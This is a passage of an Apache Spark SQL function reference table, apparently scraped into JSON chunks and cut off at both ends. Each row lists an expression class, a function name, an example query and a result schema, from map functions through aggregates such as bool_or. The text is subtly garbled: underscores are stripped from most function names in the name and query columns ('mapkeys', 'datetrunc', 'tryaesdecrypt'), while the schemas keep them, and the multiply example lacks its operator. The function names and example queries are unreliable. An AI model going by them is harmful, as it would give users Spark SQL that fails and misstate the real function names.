4)):map<decimal(2,1),string>> | | org.apache.spark.sql.catalyst.expressions.MapFromEntries | mapfromentries | SELECT mapfromentries(array(struct(1, 'a'), struct(2, 'b'))) | struct<mapfromentries(array(struct(1, a), struct(2, b))):map<int,string>> | | org.apache.spark.sql.catalyst.expressions.MapKeys | mapkeys | SELECT mapkeys(map(1, 'a', 2, 'b')) | struct<map_keys(map(1, a, 2, b)):array<int>> | | org.apache.spark.sql.catalyst.expressions.MapValues | mapvalues | SELECT mapvalues(map(1, 'a', 2, 'b')) | struct<map_values(map(1, a, 2, b)):array<string>> | | org.apache.spark.sql.catalyst.expressions.MapZipWith | mapzipwith | SELECT mapzipwith(map(1, 'a', 2, 'b'), map(1, 'x', 2, 'y'), (k, v1, v2) -> concat(v1, v2)) | struct<mapzipwith(map(1, a, 2, b), map(1, x, 2, y), lambdafunction(concat(namedlambdavariable(), namedlambdavariable()), namedlambdavariable(), namedlambdavariable(), namedlambdavariable())):map<int,string>> | | org.apache.spark.sql.catalyst.expressions.MaskExpressionBuilder | mask | SELECT mask('abcd-EFGH-8765-4321') | struct<mask(abcd-EFGH-8765-4321, X, x, n, NULL):string> | | org.apache.spark.sql.catalyst.expressions.Md5 | md5 | SELECT md5('Spark') | struct<md5(Spark):string> | | org.apache.spark.sql.catalyst.expressions.MicrosToTimestamp | timestampmicros | SELECT timestampmicros(1230219000123123) | struct<timestamp_micros(1230219000123123):timestamp> | | org.apache.spark.sql.catalyst.expressions.MillisToTimestamp | timestampmillis | SELECT timestampmillis(1230219000123) | struct<timestamp_millis(1230219000123):timestamp> | | org.apache.spark.sql.catalyst.expressions.Minute | minute | SELECT minute('2009-07-30 12:58:59') | struct<minute(2009-07-30 12:58:59):int> | | org.apache.spark.sql.catalyst.expressions.MonotonicallyIncreasingID | monotonicallyincreasingid | SELECT monotonicallyincreasingid() | struct<monotonicallyincreasingid():bigint> | | org.apache.spark.sql.catalyst.expressions.Month | month | SELECT month('2016-07-30') | struct<month(2016-07-30):int> | | org.apache.spark.sql.catalyst.expressions.MonthName | monthname | SELECT monthname('2008-02-20') | struct<monthname(2008-02-20):string> | | org.apache.spark.sql.catalyst.expressions.MonthsBetween | monthsbetween | SELECT monthsbetween('1997-02-28 10:30:00', '1996-10-30') | struct<months_between(1997-02-28 10:30:00, 1996-10-30, true):double> | | org.apache.spark.sql.catalyst.expressions.Multiply | | SELECT 2 3 | struct<(2 * 3):int> | | org.apache.spark.sql.catalyst.expressions.Murmur3Hash | hash | SELECT hash('Spark', array(123), 2) | struct<hash(Spark, array(123), 2):int> | | org.apache.spark.sql.catalyst.expressions.NTile | ntile | SELECT a, b, ntile(2) OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,ntile(2) OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST ROWS BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW):int> | | org.apache.spark.sql.catalyst.expressions.NaNvl | nanvl | SELECT nanvl(cast('NaN' as double), 123) | struct<nanvl(CAST(NaN AS DOUBLE), 123):double> | | org.apache.spark.sql.catalyst.expressions.NextDay | nextday | SELECT nextday('2015-01-14', 'TU') | struct<next_day(2015-01-14, TU):date> | | org.apache.spark.sql.catalyst.expressions.Not | ! | SELECT ! true | struct<(NOT true):boolean> | | org.apache.spark.sql.catalyst.expressions.Not | not | SELECT not true | struct<(NOT true):boolean> | |" }, { "data": "| now | SELECT now() | struct<now():timestamp> | | org.apache.spark.sql.catalyst.expressions.NthValue | nthvalue | SELECT a, b, nthvalue(b, 2) OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,nth_value(b, 2) OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST RANGE BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW):int> | | org.apache.spark.sql.catalyst.expressions.NullIf | nullif | SELECT nullif(2, 2) | struct<nullif(2, 2):int> | | org.apache.spark.sql.catalyst.expressions.Nvl | ifnull | SELECT ifnull(NULL, array('2')) | struct<ifnull(NULL, array(2)):array<string>> | | org.apache.spark.sql.catalyst.expressions.Nvl | nvl | SELECT nvl(NULL, array('2')) | struct<nvl(NULL, array(2)):array<string>> | | org.apache.spark.sql.catalyst.expressions.Nvl2 | nvl2 | SELECT nvl2(NULL, 2, 1) | struct<nvl2(NULL, 2, 1):int> | | org.apache.spark.sql.catalyst.expressions.OctetLength | octetlength | SELECT octetlength('Spark SQL') | struct<octet_length(Spark SQL):int> | | org.apache.spark.sql.catalyst.expressions.Or | or | SELECT true or false | struct<(true OR false):boolean> | | org.apache.spark.sql.catalyst.expressions.Overlay | overlay | SELECT overlay('Spark SQL' PLACING '' FROM 6) | struct<overlay(Spark SQL, , 6, -1):string> | | org.apache.spark.sql.catalyst.expressions.ParseToDate | todate | SELECT todate('2009-07-30 04:17:52') | struct<to_date(2009-07-30 04:17:52):date> | | org.apache.spark.sql.catalyst.expressions.ParseToTimestamp | totimestamp | SELECT totimestamp('2016-12-31 00:12:00') | struct<to_timestamp(2016-12-31 00:12:00):timestamp> | | org.apache.spark.sql.catalyst.expressions.ParseToTimestampLTZExpressionBuilder | totimestampltz | SELECT totimestampltz('2016-12-31 00:12:00') | struct<totimestampltz(2016-12-31 00:12:00):timestamp> | | org.apache.spark.sql.catalyst.expressions.ParseToTimestampNTZExpressionBuilder | totimestampntz | SELECT totimestampntz('2016-12-31 00:12:00') | struct<totimestampntz(2016-12-31 00:12:00):timestamp_ntz> | | org.apache.spark.sql.catalyst.expressions.ParseUrl | parseurl | SELECT parseurl('http://spark.apache.org/path?query=1', 'HOST') | struct<parse_url(http://spark.apache.org/path?query=1, HOST):string> | | org.apache.spark.sql.catalyst.expressions.PercentRank | percentrank | SELECT a, b, percentrank(b) OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,PERCENT_RANK() OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST ROWS BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW):double> | | org.apache.spark.sql.catalyst.expressions.Pi | pi | SELECT pi() | struct<PI():double> | | org.apache.spark.sql.catalyst.expressions.Pmod | pmod | SELECT pmod(10, 3) | struct<pmod(10, 3):int> | | org.apache.spark.sql.catalyst.expressions.PosExplode | posexplode | SELECT posexplode(array(10,20)) | struct<pos:int,col:int> | | org.apache.spark.sql.catalyst.expressions.PosExplode | posexplodeouter | SELECT posexplodeouter(array(10,20)) | struct<pos:int,col:int> | | org.apache.spark.sql.catalyst.expressions.Pow | pow | SELECT pow(2, 3) | struct<pow(2, 3):double> | | org.apache.spark.sql.catalyst.expressions.Pow | power | SELECT power(2, 3) | struct<POWER(2, 3):double> | | org.apache.spark.sql.catalyst.expressions.Quarter | quarter | SELECT quarter('2016-08-31') | struct<quarter(2016-08-31):int> | | org.apache.spark.sql.catalyst.expressions.RLike | regexp | SELECT regexp('%SystemDrive%\\Users\\John', '%SystemDrive%\\\\Users.') | struct<REGEXP(%SystemDrive%UsersJohn, %SystemDrive%\\Users.):boolean> | | org.apache.spark.sql.catalyst.expressions.RLike | regexplike | SELECT regexplike('%SystemDrive%\\Users\\John', '%SystemDrive%\\\\Users.') | struct<REGEXP_LIKE(%SystemDrive%UsersJohn, %SystemDrive%\\Users.):boolean> | | org.apache.spark.sql.catalyst.expressions.RLike | rlike | SELECT rlike('%SystemDrive%\\Users\\John', '%SystemDrive%\\\\Users.') | struct<RLIKE(%SystemDrive%UsersJohn, %SystemDrive%\\Users.):boolean> | | org.apache.spark.sql.catalyst.expressions.RPadExpressionBuilder | rpad | SELECT rpad('hi', 5, '??') | struct<rpad(hi, 5, ??):string> | | org.apache.spark.sql.catalyst.expressions.RaiseErrorExpressionBuilder | raiseerror | SELECT raiseerror('custom error message') | struct<raiseerror(USERRAISED_EXCEPTION, map(errorMessage, custom error message)):void> | | org.apache.spark.sql.catalyst.expressions.Rand | rand | SELECT rand() | struct<rand():double> | | org.apache.spark.sql.catalyst.expressions.Rand | random | SELECT random() | struct<rand():double> | | org.apache.spark.sql.catalyst.expressions.Randn | randn | SELECT randn() | struct<randn():double> | | org.apache.spark.sql.catalyst.expressions.Rank | rank | SELECT a, b, rank(b) OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,RANK() OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST ROWS BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW):int> | | org.apache.spark.sql.catalyst.expressions.RegExpCount | regexpcount | SELECT regexpcount('Steven Jones and Stephen Smith are the best players', 'Ste(v&#124;ph)en') | struct<regexp_count(Steven Jones and Stephen Smith are the best players, Ste(v&#124;ph)en):int> | | org.apache.spark.sql.catalyst.expressions.RegExpExtract | regexpextract | SELECT regexpextract('100-200', '(\\\\d+)-(\\\\d+)', 1) | struct<regexp_extract(100-200, (\\d+)-(\\d+), 1):string> | | org.apache.spark.sql.catalyst.expressions.RegExpExtractAll | regexpextractall | SELECT regexpextractall('100-200, 300-400', '(\\\\d+)-(\\\\d+)', 1) | struct<regexpextractall(100-200, 300-400, (\\d+)-(\\d+), 1):array<string>> | | org.apache.spark.sql.catalyst.expressions.RegExpInStr | regexpinstr | SELECT regexpinstr(r\"\\abc\", r\"^\\\\abc$\") | struct<regexp_instr(\\abc, ^\\\\abc$, 0):int> | | org.apache.spark.sql.catalyst.expressions.RegExpReplace | regexpreplace | SELECT regexpreplace('100-200', '(\\\\d+)', 'num') | struct<regexp_replace(100-200, (\\d+), num, 1):string> | |" }, { "data": "| regexpsubstr | SELECT regexpsubstr('Steven Jones and Stephen Smith are the best players', 'Ste(v&#124;ph)en') | struct<regexp_substr(Steven Jones and Stephen Smith are the best players, Ste(v&#124;ph)en):string> | | org.apache.spark.sql.catalyst.expressions.Remainder | % | SELECT 2 % 1.8 | struct<(2 % 1.8):decimal(2,1)> | | org.apache.spark.sql.catalyst.expressions.Remainder | mod | SELECT 2 % 1.8 | struct<(2 % 1.8):decimal(2,1)> | | org.apache.spark.sql.catalyst.expressions.Reverse | reverse | SELECT reverse('Spark SQL') | struct<reverse(Spark SQL):string> | | org.apache.spark.sql.catalyst.expressions.Right | right | SELECT right('Spark SQL', 3) | struct<right(Spark SQL, 3):string> | | org.apache.spark.sql.catalyst.expressions.Rint | rint | SELECT rint(12.3456) | struct<rint(12.3456):double> | | org.apache.spark.sql.catalyst.expressions.Round | round | SELECT round(2.5, 0) | struct<round(2.5, 0):decimal(2,0)> | | org.apache.spark.sql.catalyst.expressions.RowNumber | rownumber | SELECT a, b, rownumber() OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,row_number() OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST ROWS BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW):int> | | org.apache.spark.sql.catalyst.expressions.SchemaOfCsv | schemaofcsv | SELECT schemaofcsv('1,abc') | struct<schemaofcsv(1,abc):string> | | org.apache.spark.sql.catalyst.expressions.SchemaOfJson | schemaofjson | SELECT schemaofjson('[{\"col\":0}]') | struct<schemaofjson([{\"col\":0}]):string> | | org.apache.spark.sql.catalyst.expressions.SchemaOfXml | schemaofxml | SELECT schemaofxml('<p><a>1</a></p>') | struct<schemaofxml(<p><a>1</a></p>):string> | | org.apache.spark.sql.catalyst.expressions.Sec | sec | SELECT sec(0) | struct<SEC(0):double> | | org.apache.spark.sql.catalyst.expressions.Second | second | SELECT second('2009-07-30 12:58:59') | struct<second(2009-07-30 12:58:59):int> | | org.apache.spark.sql.catalyst.expressions.SecondsToTimestamp | timestampseconds | SELECT timestampseconds(1230219000) | struct<timestamp_seconds(1230219000):timestamp> | | org.apache.spark.sql.catalyst.expressions.Sentences | sentences | SELECT sentences('Hi there! Good morning.') | struct<sentences(Hi there! Good morning., , ):array<array<string>>> | | org.apache.spark.sql.catalyst.expressions.Sequence | sequence | SELECT sequence(1, 5) | struct<sequence(1, 5):array<int>> | | org.apache.spark.sql.catalyst.expressions.SessionWindow | sessionwindow | SELECT a, sessionwindow.start, sessionwindow.end, count(*) as cnt FROM VALUES ('A1', '2021-01-01 00:00:00'), ('A1', '2021-01-01 00:04:30'), ('A1', '2021-01-01 00:10:00'), ('A2', '2021-01-01 00:01:00') AS tab(a, b) GROUP by a, sessionwindow(b, '5 minutes') ORDER BY a, start | struct<a:string,start:timestamp,end:timestamp,cnt:bigint> | | org.apache.spark.sql.catalyst.expressions.Sha1 | sha | SELECT sha('Spark') | struct<sha(Spark):string> | | org.apache.spark.sql.catalyst.expressions.Sha1 | sha1 | SELECT sha1('Spark') | struct<sha1(Spark):string> | | org.apache.spark.sql.catalyst.expressions.Sha2 | sha2 | SELECT sha2('Spark', 256) | struct<sha2(Spark, 256):string> | | org.apache.spark.sql.catalyst.expressions.ShiftLeft | shiftleft | SELECT shiftleft(2, 1) | struct<shiftleft(2, 1):int> | | org.apache.spark.sql.catalyst.expressions.ShiftRight | shiftright | SELECT shiftright(4, 1) | struct<shiftright(4, 1):int> | | org.apache.spark.sql.catalyst.expressions.ShiftRightUnsigned | shiftrightunsigned | SELECT shiftrightunsigned(4, 1) | struct<shiftrightunsigned(4, 1):int> | | org.apache.spark.sql.catalyst.expressions.Shuffle | shuffle | SELECT shuffle(array(1, 20, 3, 5)) | struct<shuffle(array(1, 20, 3, 5)):array<int>> | | org.apache.spark.sql.catalyst.expressions.Signum | sign | SELECT sign(40) | struct<sign(40):double> | | org.apache.spark.sql.catalyst.expressions.Signum | signum | SELECT signum(40) | struct<SIGNUM(40):double> | | org.apache.spark.sql.catalyst.expressions.Sin | sin | SELECT sin(0) | struct<SIN(0):double> | | org.apache.spark.sql.catalyst.expressions.Sinh | sinh | SELECT sinh(0) | struct<SINH(0):double> | | org.apache.spark.sql.catalyst.expressions.Size | cardinality | SELECT cardinality(array('b', 'd', 'c', 'a')) | struct<cardinality(array(b, d, c, a)):int> | | org.apache.spark.sql.catalyst.expressions.Size | size | SELECT size(array('b', 'd', 'c', 'a')) | struct<size(array(b, d, c, a)):int> | | org.apache.spark.sql.catalyst.expressions.Slice | slice | SELECT slice(array(1, 2, 3, 4), 2, 2) | struct<slice(array(1, 2, 3, 4), 2, 2):array<int>> | | org.apache.spark.sql.catalyst.expressions.SortArray | sortarray | SELECT sortarray(array('b', 'd', null, 'c', 'a'), true) | struct<sort_array(array(b, d, NULL, c, a), true):array<string>> | | org.apache.spark.sql.catalyst.expressions.SoundEx | soundex | SELECT soundex('Miller') | struct<soundex(Miller):string> | | org.apache.spark.sql.catalyst.expressions.SparkPartitionID | sparkpartitionid | SELECT sparkpartitionid() | struct<SPARKPARTITIONID():int> | | org.apache.spark.sql.catalyst.expressions.SparkVersion | version | SELECT version() | struct<version():string> | | org.apache.spark.sql.catalyst.expressions.SplitPart | splitpart | SELECT splitpart('11.12.13', '.', 3) | struct<split_part(11.12.13, ., 3):string> | | org.apache.spark.sql.catalyst.expressions.Sqrt | sqrt | SELECT sqrt(4) | struct<SQRT(4):double> | | org.apache.spark.sql.catalyst.expressions.Stack | stack | SELECT stack(2, 1, 2, 3) | struct<col0:int,col1:int> | | org.apache.spark.sql.catalyst.expressions.StartsWithExpressionBuilder | startswith | SELECT startswith('Spark SQL', 'Spark') | struct<startswith(Spark SQL, Spark):boolean> | | org.apache.spark.sql.catalyst.expressions.StringInstr | instr | SELECT instr('SparkSQL', 'SQL') | struct<instr(SparkSQL, SQL):int> | | org.apache.spark.sql.catalyst.expressions.StringLocate | locate | SELECT locate('bar', 'foobarbar') | struct<locate(bar, foobarbar, 1):int> | |" }, { "data": "| position | SELECT position('bar', 'foobarbar') | struct<position(bar, foobarbar, 1):int> | | org.apache.spark.sql.catalyst.expressions.StringRepeat | repeat | SELECT repeat('123', 2) | struct<repeat(123, 2):string> | | org.apache.spark.sql.catalyst.expressions.StringReplace | replace | SELECT replace('ABCabc', 'abc', 'DEF') | struct<replace(ABCabc, abc, DEF):string> | | org.apache.spark.sql.catalyst.expressions.StringSpace | space | SELECT concat(space(2), '1') | struct<concat(space(2), 1):string> | | org.apache.spark.sql.catalyst.expressions.StringSplit | split | SELECT split('oneAtwoBthreeC', '[ABC]') | struct<split(oneAtwoBthreeC, [ABC], -1):array<string>> | | org.apache.spark.sql.catalyst.expressions.StringToMap | strtomap | SELECT strtomap('a:1,b:2,c:3', ',', ':') | struct<strtomap(a:1,b:2,c:3, ,, :):map<string,string>> | | org.apache.spark.sql.catalyst.expressions.StringTranslate | translate | SELECT translate('AaBbCc', 'abc', '123') | struct<translate(AaBbCc, abc, 123):string> | | org.apache.spark.sql.catalyst.expressions.StringTrim | trim | SELECT trim(' SparkSQL ') | struct<trim( SparkSQL ):string> | | org.apache.spark.sql.catalyst.expressions.StringTrimBoth | btrim | SELECT btrim(' SparkSQL ') | struct<btrim( SparkSQL ):string> | | org.apache.spark.sql.catalyst.expressions.StringTrimLeft | ltrim | SELECT ltrim(' SparkSQL ') | struct<ltrim( SparkSQL ):string> | | org.apache.spark.sql.catalyst.expressions.StringTrimRight | rtrim | SELECT rtrim(' SparkSQL ') | struct<rtrim( SparkSQL ):string> | | org.apache.spark.sql.catalyst.expressions.StructsToCsv | tocsv | SELECT tocsv(namedstruct('a', 1, 'b', 2)) | struct<tocsv(named_struct(a, 1, b, 2)):string> | | org.apache.spark.sql.catalyst.expressions.StructsToJson | tojson | SELECT tojson(namedstruct('a', 1, 'b', 2)) | struct<tojson(named_struct(a, 1, b, 2)):string> | | org.apache.spark.sql.catalyst.expressions.StructsToXml | toxml | SELECT toxml(namedstruct('a', 1, 'b', 2)) | struct<toxml(named_struct(a, 1, b, 2)):string> | | org.apache.spark.sql.catalyst.expressions.Substring | substr | SELECT substr('Spark SQL', 5) | struct<substr(Spark SQL, 5, 2147483647):string> | | org.apache.spark.sql.catalyst.expressions.Substring | substring | SELECT substring('Spark SQL', 5) | struct<substring(Spark SQL, 5, 2147483647):string> | | org.apache.spark.sql.catalyst.expressions.SubstringIndex | substringindex | SELECT substringindex('www.apache.org', '.', 2) | struct<substring_index(www.apache.org, ., 2):string> | | org.apache.spark.sql.catalyst.expressions.Subtract | - | SELECT 2 - 1 | struct<(2 - 1):int> | | org.apache.spark.sql.catalyst.expressions.Tan | tan | SELECT tan(0) | struct<TAN(0):double> | | org.apache.spark.sql.catalyst.expressions.Tanh | tanh | SELECT tanh(0) | struct<TANH(0):double> | | org.apache.spark.sql.catalyst.expressions.TimeWindow | window | SELECT a, window.start, window.end, count(*) as cnt FROM VALUES ('A1', '2021-01-01 00:00:00'), ('A1', '2021-01-01 00:04:30'), ('A1', '2021-01-01 00:06:00'), ('A2', '2021-01-01 00:01:00') AS tab(a, b) GROUP by a, window(b, '5 minutes') ORDER BY a, start | struct<a:string,start:timestamp,end:timestamp,cnt:bigint> | | org.apache.spark.sql.catalyst.expressions.ToBinary | tobinary | SELECT tobinary('abc', 'utf-8') | struct<to_binary(abc, utf-8):binary> | | org.apache.spark.sql.catalyst.expressions.ToCharacterBuilder | tochar | SELECT tochar(454, '999') | struct<to_char(454, 999):string> | | org.apache.spark.sql.catalyst.expressions.ToCharacterBuilder | tovarchar | SELECT tovarchar(454, '999') | struct<to_char(454, 999):string> | | org.apache.spark.sql.catalyst.expressions.ToDegrees | degrees | SELECT degrees(3.141592653589793) | struct<DEGREES(3.141592653589793):double> | | org.apache.spark.sql.catalyst.expressions.ToNumber | tonumber | SELECT tonumber('454', '999') | struct<to_number(454, 999):decimal(3,0)> | | org.apache.spark.sql.catalyst.expressions.ToRadians | radians | SELECT radians(180) | struct<RADIANS(180):double> | | org.apache.spark.sql.catalyst.expressions.ToUTCTimestamp | toutctimestamp | SELECT toutctimestamp('2016-08-31', 'Asia/Seoul') | struct<toutctimestamp(2016-08-31, Asia/Seoul):timestamp> | | org.apache.spark.sql.catalyst.expressions.ToUnixTimestamp | tounixtimestamp | SELECT tounixtimestamp('2016-04-08', 'yyyy-MM-dd') | struct<tounixtimestamp(2016-04-08, yyyy-MM-dd):bigint> | | org.apache.spark.sql.catalyst.expressions.TransformKeys | transformkeys | SELECT transformkeys(mapfromarrays(array(1, 2, 3), array(1, 2, 3)), (k, v) -> k + 1) | struct<transformkeys(mapfrom_arrays(array(1, 2, 3), array(1, 2, 3)), lambdafunction((namedlambdavariable() + 1), namedlambdavariable(), namedlambdavariable())):map<int,int>> | | org.apache.spark.sql.catalyst.expressions.TransformValues | transformvalues | SELECT transformvalues(mapfromarrays(array(1, 2, 3), array(1, 2, 3)), (k, v) -> v + 1) | struct<transformvalues(mapfrom_arrays(array(1, 2, 3), array(1, 2, 3)), lambdafunction((namedlambdavariable() + 1), namedlambdavariable(), namedlambdavariable())):map<int,int>> | | org.apache.spark.sql.catalyst.expressions.TruncDate | trunc | SELECT trunc('2019-08-04', 'week') | struct<trunc(2019-08-04, week):date> | | org.apache.spark.sql.catalyst.expressions.TruncTimestamp | datetrunc | SELECT datetrunc('YEAR', '2015-03-05T09:32:05.359') | struct<date_trunc(YEAR, 2015-03-05T09:32:05.359):timestamp> | | org.apache.spark.sql.catalyst.expressions.TryAdd | tryadd | SELECT tryadd(1, 2) | struct<try_add(1, 2):int> | | org.apache.spark.sql.catalyst.expressions.TryAesDecrypt | tryaesdecrypt | SELECT tryaesdecrypt(unhex('6E7CA17BBB468D3084B5744BCA729FB7B2B7BCB8E4472847D02670489D95FA97DBBA7D3210'), '0000111122223333', 'GCM') | struct<tryaesdecrypt(unhex(6E7CA17BBB468D3084B5744BCA729FB7B2B7BCB8E4472847D02670489D95FA97DBBA7D3210), 0000111122223333, GCM, DEFAULT, ):binary> | | org.apache.spark.sql.catalyst.expressions.TryDivide | trydivide | SELECT trydivide(3, 2) | struct<try_divide(3, 2):double> | | org.apache.spark.sql.catalyst.expressions.TryElementAt | tryelementat | SELECT tryelementat(array(1, 2, 3), 2) | struct<tryelementat(array(1, 2, 3), 2):int> | | org.apache.spark.sql.catalyst.expressions.TryMultiply | trymultiply | SELECT trymultiply(2, 3) | struct<try_multiply(2, 3):int> | | org.apache.spark.sql.catalyst.expressions.TryReflect | tryreflect | SELECT tryreflect('java.util.UUID', 'randomUUID') | struct<try_reflect(java.util.UUID, randomUUID):string> | |" }, { "data": "| tryremainder | SELECT tryremainder(3, 2) | struct<try_remainder(3, 2):int> | | org.apache.spark.sql.catalyst.expressions.TrySubtract | trysubtract | SELECT trysubtract(2, 1) | struct<try_subtract(2, 1):int> | | org.apache.spark.sql.catalyst.expressions.TryToBinary | trytobinary | SELECT trytobinary('abc', 'utf-8') | struct<trytobinary(abc, utf-8):binary> | | org.apache.spark.sql.catalyst.expressions.TryToNumber | trytonumber | SELECT trytonumber('454', '999') | struct<trytonumber(454, 999):decimal(3,0)> | | org.apache.spark.sql.catalyst.expressions.TryToTimestampExpressionBuilder | trytotimestamp | SELECT trytotimestamp('2016-12-31 00:12:00') | struct<trytotimestamp(2016-12-31 00:12:00):timestamp> | | org.apache.spark.sql.catalyst.expressions.TypeOf | typeof | SELECT typeof(1) | struct<typeof(1):string> | | org.apache.spark.sql.catalyst.expressions.UnBase64 | unbase64 | SELECT unbase64('U3BhcmsgU1FM') | struct<unbase64(U3BhcmsgU1FM):binary> | | org.apache.spark.sql.catalyst.expressions.UnaryMinus | negative | SELECT negative(1) | struct<negative(1):int> | | org.apache.spark.sql.catalyst.expressions.UnaryPositive | positive | SELECT positive(1) | struct<(+ 1):int> | | org.apache.spark.sql.catalyst.expressions.Unhex | unhex | SELECT decode(unhex('537061726B2053514C'), 'UTF-8') | struct<decode(unhex(537061726B2053514C), UTF-8):string> | | org.apache.spark.sql.catalyst.expressions.UnixDate | unixdate | SELECT unixdate(DATE(\"1970-01-02\")) | struct<unix_date(1970-01-02):int> | | org.apache.spark.sql.catalyst.expressions.UnixMicros | unixmicros | SELECT unixmicros(TIMESTAMP('1970-01-01 00:00:01Z')) | struct<unix_micros(1970-01-01 00:00:01Z):bigint> | | org.apache.spark.sql.catalyst.expressions.UnixMillis | unixmillis | SELECT unixmillis(TIMESTAMP('1970-01-01 00:00:01Z')) | struct<unix_millis(1970-01-01 00:00:01Z):bigint> | | org.apache.spark.sql.catalyst.expressions.UnixSeconds | unixseconds | SELECT unixseconds(TIMESTAMP('1970-01-01 00:00:01Z')) | struct<unix_seconds(1970-01-01 00:00:01Z):bigint> | | org.apache.spark.sql.catalyst.expressions.UnixTimestamp | unixtimestamp | SELECT unixtimestamp() | struct<unixtimestamp(currenttimestamp(), yyyy-MM-dd HH:mm:ss):bigint> | | org.apache.spark.sql.catalyst.expressions.Upper | ucase | SELECT ucase('SparkSql') | struct<ucase(SparkSql):string> | | org.apache.spark.sql.catalyst.expressions.Upper | upper | SELECT upper('SparkSql') | struct<upper(SparkSql):string> | | org.apache.spark.sql.catalyst.expressions.UrlDecode | urldecode | SELECT urldecode('https%3A%2F%2Fspark.apache.org') | struct<url_decode(https%3A%2F%2Fspark.apache.org):string> | | org.apache.spark.sql.catalyst.expressions.UrlEncode | urlencode | SELECT urlencode('https://spark.apache.org') | struct<url_encode(https://spark.apache.org):string> | | org.apache.spark.sql.catalyst.expressions.Uuid | uuid | SELECT uuid() | struct<uuid():string> | | org.apache.spark.sql.catalyst.expressions.WeekDay | weekday | SELECT weekday('2009-07-30') | struct<weekday(2009-07-30):int> | | org.apache.spark.sql.catalyst.expressions.WeekOfYear | weekofyear | SELECT weekofyear('2008-02-20') | struct<weekofyear(2008-02-20):int> | | org.apache.spark.sql.catalyst.expressions.WidthBucket | widthbucket | SELECT widthbucket(5.3, 0.2, 10.6, 5) | struct<width_bucket(5.3, 0.2, 10.6, 5):bigint> | | org.apache.spark.sql.catalyst.expressions.WindowTime | windowtime | SELECT a, window.start as start, window.end as end, windowtime(window), cnt FROM (SELECT a, window, count(*) as cnt FROM VALUES ('A1', '2021-01-01 00:00:00'), ('A1', '2021-01-01 00:04:30'), ('A1', '2021-01-01 00:06:00'), ('A2', '2021-01-01 00:01:00') AS tab(a, b) GROUP by a, window(b, '5 minutes') ORDER BY a, window.start) | struct<a:string,start:timestamp,end:timestamp,window_time(window):timestamp,cnt:bigint> | | org.apache.spark.sql.catalyst.expressions.XmlToStructs | fromxml | SELECT fromxml('<p><a>1</a><b>0.8</b></p>', 'a INT, b DOUBLE') | struct<from_xml(<p><a>1</a><b>0.8</b></p>):struct<a:int,b:double>> | | org.apache.spark.sql.catalyst.expressions.XxHash64 | xxhash64 | SELECT xxhash64('Spark', array(123), 2) | struct<xxhash64(Spark, array(123), 2):bigint> | | org.apache.spark.sql.catalyst.expressions.Year | year | SELECT year('2016-07-30') | struct<year(2016-07-30):int> | | org.apache.spark.sql.catalyst.expressions.ZipWith | zipwith | SELECT zipwith(array(1, 2, 3), array('a', 'b', 'c'), (x, y) -> (y, x)) | struct<zipwith(array(1, 2, 3), array(a, b, c), lambdafunction(namedstruct(y, namedlambdavariable(), x, namedlambdavariable()), namedlambdavariable(), namedlambdavariable())):array<struct<y:string,x:int>>> | | org.apache.spark.sql.catalyst.expressions.aggregate.AnyValue | anyvalue | SELECT anyvalue(col) FROM VALUES (10), (5), (20) AS tab(col) | struct<any_value(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.ApproximatePercentile | approxpercentile | SELECT approxpercentile(col, array(0.5, 0.4, 0.1), 100) FROM VALUES (0), (1), (2), (10) AS tab(col) | struct<approx_percentile(col, array(0.5, 0.4, 0.1), 100):array<int>> | | org.apache.spark.sql.catalyst.expressions.aggregate.ApproximatePercentile | percentileapprox | SELECT percentileapprox(col, array(0.5, 0.4, 0.1), 100) FROM VALUES (0), (1), (2), (10) AS tab(col) | struct<percentile_approx(col, array(0.5, 0.4, 0.1), 100):array<int>> | | org.apache.spark.sql.catalyst.expressions.aggregate.Average | avg | SELECT avg(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<avg(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.Average | mean | SELECT mean(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<mean(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.BitAndAgg | bitand | SELECT bitand(col) FROM VALUES (3), (5) AS tab(col) | struct<bit_and(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.BitOrAgg | bitor | SELECT bitor(col) FROM VALUES (3), (5) AS tab(col) | struct<bit_or(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.BitXorAgg | bitxor | SELECT bitxor(col) FROM VALUES (3), (5) AS tab(col) | struct<bit_xor(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.BoolAnd | booland | SELECT booland(col) FROM VALUES (true), (true), (true) AS tab(col) | struct<bool_and(col):boolean> | | org.apache.spark.sql.catalyst.expressions.aggregate.BoolAnd | every | SELECT every(col) FROM VALUES (true), (true), (true) AS tab(col) | struct<every(col):boolean> | | org.apache.spark.sql.catalyst.expressions.aggregate.BoolOr | any | SELECT any(col) FROM VALUES (true), (false), (false) AS tab(col) | struct<any(col):boolean> | |" }, { "data": "| boolor | SELECT boolor(col) FROM VALUES (true), (false), (false) AS tab(col) | struct<bool_or(col):boolean> | | org.apache.spark.sql.catalyst.expressions.aggregate.BoolOr | some | SELECT some(col) FROM VALUES (true), (false), (false) AS tab(col) | struct<some(col):boolean> | | org.apache.spark.sql.catalyst.expressions.aggregate.CollectList | arrayagg | SELECT arrayagg(col) FROM VALUES (1), (2), (1) AS tab(col) | 